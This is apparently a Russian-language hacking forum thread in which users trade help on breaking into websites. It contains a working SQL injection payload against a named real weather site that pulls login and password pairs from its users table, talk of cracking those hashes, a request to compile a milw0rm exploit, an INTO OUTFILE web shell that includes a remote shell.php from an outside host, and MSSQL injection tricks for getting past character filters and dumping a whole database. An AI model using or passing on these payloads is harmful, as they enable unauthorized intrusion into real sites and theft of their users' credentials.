а ты попробуй через бинарник сишный, баш, другой порт, бекконект встроенный в WSO2 тот же - отличная вещь, как практика показывает PS: Порт повыше бери
Можно ли выполнить комманду если: Code: Disable functions : symlink, dl, shell_exec, exec, system, passthru, popen, proc_open, proc_nice, proc_get_status, proc_close, proc_terminate, posix_mkfifo, set_time_limit, imap_open, imap_body,imap_list, imap_createmailbox, imap_deletemailbox, imap_renamemailbox, mb_send_mail
http://www.pogoda.ua/index.php?id=6209+and+1=0+union+select+0,1,2,3,4-- там скуль четвертой версии...я пробрутил названия таблиц..толку мало...можно ли че-нить сделать ?!
Вполне себе существует таблица users с полями login и password: Code: http://www.pogoda.ua/index.php?id=-1+union+select+0,concat_ws(0x3a,login,password),2,3,4+from+users-- Уж к чему-то, но они подходят. Кроме того, прокатывает запрос вида: Code: http://www.pogoda.ua/index.php?id=-1+union+select+0,'1',2,3,4-- Подозреваю, что разрешены кавычки, но не уверен - попробовал прочитать файл через load_file(), - не вышло. Думаю, из-за того что файловых прав нет.
Извините за глупость... Помогите скомпилить сплойт,желательно под винду, но и линухом не побрезгую. Ну не знаю я си ( http://milw0rm.com/exploits/98 Заранее благодарен.
Не знаю, у меня его замечательно расшифровал passcracking.ru . Проблема в том, что этот логин\пароль к админке не подошёл. Нужно дальше таблицы брутить.
прошу помощи есть полный доступ к бд сайта каким тыком залить на сайт шелл через mysql? select '<? @include("http://moysite.ru/shell.php"); ?>' into outfile 'сервак стоит на винде' после заливки открывает пустую страницу <?php system($cmd) ?> тоже непомог
<?phpinfo();?> для начала попробуй залить, заодно увидишь, разрешен ли allow_url_include, allow_url_fopen и system, и еще много чего инетересного увидишь
Моя очередь вам мозг убить Есть скуля - MSSQL тама идёт запрос SELECT * FROM table WHERE id = #id# id=1 OR 1=@@version = SQL Server 2000 Тоесть есть вывод через ошибки, обычный вывод - геморой, тута страницы 2 надо чоб описать всё, поэтому вопрос про вывод через ошибки Я знаю структуру БД, такчто таблы мне искать ненад Мне надо выбить инфу из таблы, вот токо на сайте фильтруются символы %()[] Чё делать P.S. Про обычный вывод - UNION SELECT... тама 69 поля, и если типы не совпадают - выбивает ошибку, а как я могу узнать в каком поле не совпадают типы =\ И всёже - чё делать с ошибкой гугл говорит заюзать чётотам(varchar(9000)) но скобки запрещены, немогу
если скобки запрещены - ничего не сделать, вроде бы, инвертировать не получится PS: но это если скобки действительно запрещены, а так convert(куда_конверт,system_user)
сначала указываешь для всех полей null, потом последовательно подставляешь строки и смотришь в каком по счету поле не будет ошибки. UNION ALL SELECT
Pashkela, скобки точно запрещены Указывал все нуллы, всёравно говорит The text, ntext, or image data type cannot be selected as DISTINCT. даже указывал -1 UNION SELECT * FROM %табла, которая используется в запросе% Опять гвоорит этуже ошибку В мелкософте какраз такой случай разбирается, но тама скобки нужны А вот это непонял куда 1 UNION ALL SELECT = Incorrect syntax near 'SELECT'
правильно, а теперь совмести то, что я сказал про null'ы и ALL SELECT 1 UNION ALL SELECT null,null,null...
Хмммм... хз как, но оно кажись получается, токо надо теперь поля под типы подобрать, цёма Эммм... А как лимит заюзать LIMIT 0,1 говорит Incorrect syntax near '0' я знаю, чо надо юзать NOT IN() но нужны скобки чё делать ===== всё, нащёл - ... WHERE column!='value'
Если нужно вытянуть всю базу.. column>'x' И ставишь на цикл, каждый раз меняя значение x на новое, вообщем всё просто.
